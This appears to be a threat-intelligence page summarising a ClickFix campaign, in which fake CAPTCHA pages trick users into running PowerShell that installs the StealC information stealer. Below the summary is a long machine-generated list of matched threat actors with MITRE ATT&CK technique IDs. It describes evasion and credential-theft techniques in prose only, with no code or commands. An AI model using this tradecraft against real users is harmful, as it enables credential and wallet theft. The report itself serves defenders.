How ClickFix Opens the Door to Stealthy StealC Information Stealer
概要
This analysis examines a sophisticated attack chain targeting Windows systems through social engineering. It uses fake CAPTCHA verification pages to trick users into executing malicious PowerShell commands. The multi-stage infection process ultimately deploys the StealC information stealer, a commodity malware designed to harvest sensitive data. The attack chain includes PowerShell scripts, position-independent shellcode, and a PE downloader, utilizing techniques like reflective PE loading, API hashing, and process injection to evade detection. StealC's capabilities include stealing browser credentials, cryptocurrency wallets, Steam accounts, Outlook credentials, and system information. The malware uses encrypted C2 communication and operates without persistence, making it particularly stealthy.
Created: 2026-03-20
Indicators
類似Pulses
類似するPulseは見つかりませんでした。
このPulseに関連する脅威アクター (事実ベース)
Score: 43.71
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1574.001 - DLL
- T1021.002 - SMB/Windows Admin Shares
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1546.008 - Accessibility Features
- T1552.001 - Credentials In Files
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1027 - Obfuscated Files or Information
- T1203 - Exploitation for Client Execution
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 50.75
Matched TTPs:
- T1053.005 - Scheduled Task
- T1548.002 - Bypass User Account Control
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1219 - Remote Access Tools
- T1055 - Process Injection
- T1218.003 - CMSTP
- T1218.008 - Odbcconf
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1195.002 - Compromise Software Supply Chain
- T1203 - Exploitation for Client Execution
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1220 - XSL Script Processing
MITREへのリンク →
Score: 34.11
Matched TTPs:
- T1053.005 - Scheduled Task
- T1113 - Screen Capture
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1106 - Native API
- T1055 - Process Injection
- T1112 - Modify Registry
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.001 - Compiled HTML File
- T1078 - Valid Accounts
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
MITREへのリンク →
Score: 55.67
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1114.001 - Local Email Collection
- T1574.001 - DLL
- T1007 - System Service Discovery
- T1106 - Native API
- T1021.002 - SMB/Windows Admin Shares
- T1021.006 - Windows Remote Management
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1039 - Data from Network Shared Drive
- T1078 - Valid Accounts
- T1589.001 - Credentials
- T1570 - Lateral Tool Transfer
- T1012 - Query Registry
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1556.001 - Domain Controller Authentication
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
MITREへのリンク →
Score: 42.23
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1548.002 - Bypass User Account Control
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1203 - Exploitation for Client Execution
- T1197 - BITS Jobs
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1102.001 - Dead Drop Resolver
MITREへのリンク →
Score: 20.47
Matched TTPs:
- T1053.005 - Scheduled Task
- T1218.011 - Rundll32
- T1003.002 - Security Account Manager
- T1574.001 - DLL
- T1059.001 - PowerShell
- T1195.002 - Compromise Software Supply Chain
- T1036.003 - Rename Legitimate Utilities
- T1012 - Query Registry
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 85.82
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1587.001 - Malware
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.004 - Drive-by Target
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
- T1620 - Reflective Code Loading
- T1562.004 - Disable or Modify System Firewall
- T1674 - Input Injection
- T1059 - Command and Scripting Interpreter
- T1218.005 - Mshta
- T1608.005 - Link Target
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1497.002 - User Activity Based Checks
- T1591 - Gather Victim Org Information
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1195.002 - Compromise Software Supply Chain
- T1102.002 - Bidirectional Communication
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
MITREへのリンク →
Score: 25.85
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1055 - Process Injection
- T1588.001 - Malware
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1518.001 - Security Software Discovery
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 35.58
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1003.002 - Security Account Manager
- T1574.001 - DLL
- T1190 - Exploit Public-Facing Application
- T1505.003 - Web Shell
- T1583.004 - Server
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1027 - Obfuscated Files or Information
- T1036.003 - Rename Legitimate Utilities
- T1570 - Lateral Tool Transfer
- T1059.003 - Windows Command Shell
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 100.62
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1491.002 - External Defacement
- T1539 - Steal Web Session Cookie
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1213.006 - Databases
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1040 - Network Sniffing
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1195 - Supply Chain Compromise
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
- T1036 - Masquerading
- T1021.002 - SMB/Windows Admin Shares
- T1555.003 - Credentials from Web Browsers
- T1505.003 - Web Shell
- T1583.004 - Server
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1090 - Proxy
- T1584.005 - Botnet
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1027 - Obfuscated Files or Information
- T1486 - Data Encrypted for Impact
- T1592.002 - Software
- T1195.002 - Compromise Software Supply Chain
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
- T1570 - Lateral Tool Transfer
- T1078.002 - Domain Accounts
- T1499 - Endpoint Denial of Service
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 70.02
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1003 - OS Credential Dumping
- T1543.003 - Windows Service
- T1140 - Deobfuscate/Decode Files or Information
- T1562 - Impair Defenses
- T1608.001 - Upload Malware
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
- T1055 - Process Injection
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1583.003 - Virtual Private Server
- T1491.001 - Internal Defacement
- T1134.003 - Make and Impersonate Token
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1570 - Lateral Tool Transfer
- T1614.001 - System Language Discovery
- T1012 - Query Registry
- T1078.002 - Domain Accounts
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
MITREへのリンク →
Score: 40.04
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1583.002 - DNS Server
- T1204.002 - Malicious File
- T1608.001 - Upload Malware
- T1555 - Credentials from Password Stores
- T1010 - Application Window Discovery
- T1555.003 - Credentials from Web Browsers
- T1589.002 - Email Addresses
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1534 - Internal Spearphishing
- T1588.002 - Tool
- T1102.002 - Bidirectional Communication
- T1027.010 - Command Obfuscation
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 90.97
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1003 - OS Credential Dumping
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1176.002 - IDE Extensions
- T1059 - Command and Scripting Interpreter
- T1219.001 - IDE Tunneling
- T1070 - Indicator Removal
- T1102 - Web Service
- T1218.005 - Mshta
- T1027.012 - LNK Icon Smuggling
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1678 - Delay Execution
- T1588.002 - Tool
- T1027 - Obfuscated Files or Information
- T1203 - Exploitation for Client Execution
- T1001.003 - Protocol or Service Impersonation
- T1059.003 - Windows Command Shell
- T1219.002 - Remote Desktop Software
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
- T1027.007 - Dynamic API Resolution
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →
Score: 79.79
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1114.001 - Local Email Collection
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1562 - Impair Defenses
- T1190 - Exploit Public-Facing Application
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1090 - Proxy
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1486 - Data Encrypted for Impact
- T1573 - Encrypted Channel
- T1592.002 - Software
- T1589.001 - Credentials
- T1102.002 - Bidirectional Communication
- T1570 - Lateral Tool Transfer
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1566.003 - Spearphishing via Service
MITREへのリンク →
Score: 55.87
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1056.001 - Keylogging
- T1003.002 - Security Account Manager
- T1587.001 - Malware
- T1574.001 - DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1021.002 - SMB/Windows Admin Shares
- T1505.003 - Web Shell
- T1021.006 - Windows Remote Management
- T1003.001 - LSASS Memory
- T1087 - Account Discovery
- T1552.001 - Credentials In Files
- T1657 - Financial Theft
- T1134.003 - Make and Impersonate Token
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1059.003 - Windows Command Shell
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1556 - Modify Authentication Process
- T1090.001 - Internal Proxy
MITREへのリンク →
Score: 22.37
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1106 - Native API
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1078.002 - Domain Accounts
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1566.003 - Spearphishing via Service
MITREへのリンク →
Score: 28.92
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1218.011 - Rundll32
- T1543.003 - Windows Service
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1112 - Modify Registry
- T1003.001 - LSASS Memory
- T1090 - Proxy
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1059.003 - Windows Command Shell
- T1134 - Access Token Manipulation
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
MITREへのリンク →
Score: 16.94
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1218.007 - Msiexec
- T1140 - Deobfuscate/Decode Files or Information
- T1555.003 - Credentials from Web Browsers
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 40.45
Matched TTPs:
- T1053.005 - Scheduled Task
- T1218.011 - Rundll32
- T1003 - OS Credential Dumping
- T1484.002 - Trust Modification
- T1190 - Exploit Public-Facing Application
- T1059.009 - Cloud API
- T1552.004 - Private Keys
- T1021.006 - Windows Remote Management
- T1657 - Financial Theft
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1486 - Data Encrypted for Impact
- T1218.010 - Regsvr32
- T1614.001 - System Language Discovery
- T1518.001 - Security Software Discovery
- T1219.002 - Remote Desktop Software
MITREへのリンク →
Score: 76.15
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1548.002 - Bypass User Account Control
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1586.003 - Cloud Accounts
- T1190 - Exploit Public-Facing Application
- T1059.009 - Cloud API
- T1505.003 - Web Shell
- T1090.002 - External Proxy
- T1546.008 - Accessibility Features
- T1649 - Steal or Forge Authentication Certificates
- T1553.005 - Mark-of-the-Web Bypass
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1573 - Encrypted Channel
- T1203 - Exploitation for Client Execution
- T1059.006 - Python
- T1027.006 - HTML Smuggling
- T1070.004 - File Deletion
- T1651 - Cloud Administration Command
- T1105 - Ingress Tool Transfer
- T1665 - Hide Infrastructure
- T1566.003 - Spearphishing via Service
MITREへのリンク →
Score: 75.20
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1003 - OS Credential Dumping
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1059.010 - AutoHotKey & AutoIT
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1555 - Credentials from Password Stores
- T1547.009 - Shortcut Modification
- T1021.002 - SMB/Windows Admin Shares
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1059 - Command and Scripting Interpreter
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1056 - Input Capture
- T1102.002 - Bidirectional Communication
- T1012 - Query Registry
- T1197 - BITS Jobs
- T1059.006 - Python
- T1546.010 - AppInit DLLs
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
- T1090.001 - Internal Proxy
MITREへのリンク →
Score: 39.20
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1021.002 - SMB/Windows Admin Shares
- T1112 - Modify Registry
- T1003.001 - LSASS Memory
- T1055.004 - Asynchronous Procedure Call
- T1102 - Web Service
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →
Score: 76.09
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1003.002 - Security Account Manager
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1055 - Process Injection
- T1518.002 - Backup Software Discovery
- T1021.002 - SMB/Windows Admin Shares
- T1021 - Remote Services
- T1112 - Modify Registry
- T1021.006 - Windows Remote Management
- T1003.001 - LSASS Memory
- T1547.004 - Winlogon Helper DLL
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1570 - Lateral Tool Transfer
- T1078.002 - Domain Accounts
- T1197 - BITS Jobs
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1555.004 - Windows Credential Manager
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →
Score: 29.12
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1547.001 - Registry Run Keys / Startup Folder
- T1203 - Exploitation for Client Execution
- T1001.003 - Protocol or Service Impersonation
- T1059.003 - Windows Command Shell
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1220 - XSL Script Processing
- T1090.001 - Internal Proxy
MITREへのリンク →
Score: 91.52
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1003.002 - Security Account Manager
- T1543.003 - Windows Service
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1190 - Exploit Public-Facing Application
- T1555 - Credentials from Password Stores
- T1055 - Process Injection
- T1021.002 - SMB/Windows Admin Shares
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1546.008 - Accessibility Features
- T1090 - Proxy
- T1059.001 - PowerShell
- T1071.002 - File Transfer Protocols
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.001 - Compiled HTML File
- T1078 - Valid Accounts
- T1027 - Obfuscated Files or Information
- T1486 - Data Encrypted for Impact
- T1195.002 - Compromise Software Supply Chain
- T1203 - Exploitation for Client Execution
- T1595.003 - Wordlist Scanning
- T1570 - Lateral Tool Transfer
- T1012 - Query Registry
- T1197 - BITS Jobs
- T1656 - Impersonation
- T1213.003 - Code Repositories
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
- T1480.001 - Environmental Keying
- T1102.001 - Dead Drop Resolver
MITREへのリンク →
Score: 10.49
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1218.007 - Msiexec
- T1059.003 - Windows Command Shell
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 58.21
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1548.002 - Bypass User Account Control
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1574.001 - DLL
- T1007 - System Service Discovery
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1190 - Exploit Public-Facing Application
- T1112 - Modify Registry
- T1583.004 - Server
- T1003.001 - LSASS Memory
- T1090 - Proxy
- T1588.001 - Malware
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1588.002 - Tool
- T1584.006 - Web Services
- T1027 - Obfuscated Files or Information
- T1027.003 - Steganography
- T1059.006 - Python
- T1189 - Drive-by Compromise
- T1059.005 - Visual Basic
MITREへのリンク →
Score: 57.55
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1003 - OS Credential Dumping
- T1491.002 - External Defacement
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1195 - Supply Chain Compromise
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1021 - Remote Services
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1588.001 - Malware
- T1583.003 - Virtual Private Server
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1562.001 - Disable or Modify Tools
- T1203 - Exploitation for Client Execution
- T1570 - Lateral Tool Transfer
- T1070.004 - File Deletion
- T1595.001 - Scanning IP Blocks
- T1588.005 - Exploits
MITREへのリンク →
Score: 14.08
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1218.007 - Msiexec
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1189 - Drive-by Compromise
- T1059.005 - Visual Basic
MITREへのリンク →
Score: 47.68
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1056.001 - Keylogging
- T1539 - Steal Web Session Cookie
- T1547 - Boot or Logon Autostart Execution
- T1566.002 - Spearphishing Link
- T1608.001 - Upload Malware
- T1070.008 - Clear Mailbox Data
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1070 - Indicator Removal
- T1583.003 - Virtual Private Server
- T1102 - Web Service
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1056 - Input Capture
- T1656 - Impersonation
- T1518.001 - Security Software Discovery
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
MITREへのリンク →
Score: 13.29
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1570 - Lateral Tool Transfer
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 11.55
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1547.001 - Registry Run Keys / Startup Folder
- T1078.002 - Domain Accounts
- T1518.001 - Security Software Discovery
MITREへのリンク →
Score: 52.24
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1218.011 - Rundll32
- T1114.001 - Local Email Collection
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1080 - Taint Shared Content
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1552.002 - Credentials in Registry
- T1202 - Indirect Command Execution
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1102 - Web Service
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1056.002 - GUI Input Capture
- T1039 - Data from Network Shared Drive
- T1027 - Obfuscated Files or Information
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
MITREへのリンク →
Score: 45.28
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1027.009 - Embedded Payloads
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1583.003 - Virtual Private Server
- T1591 - Gather Victim Org Information
- T1547.001 - Registry Run Keys / Startup Folder
- T1027 - Obfuscated Files or Information
- T1486 - Data Encrypted for Impact
- T1195.002 - Compromise Software Supply Chain
- T1598 - Phishing for Information
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1569.002 - Service Execution
- T1566.003 - Spearphishing via Service
MITREへのリンク →
Score: 91.68
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1216.001 - PubPrn
- T1003 - OS Credential Dumping
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1608.004 - Drive-by Target
- T1552.002 - Credentials in Registry
- T1608.001 - Upload Malware
- T1036 - Masquerading
- T1055 - Process Injection
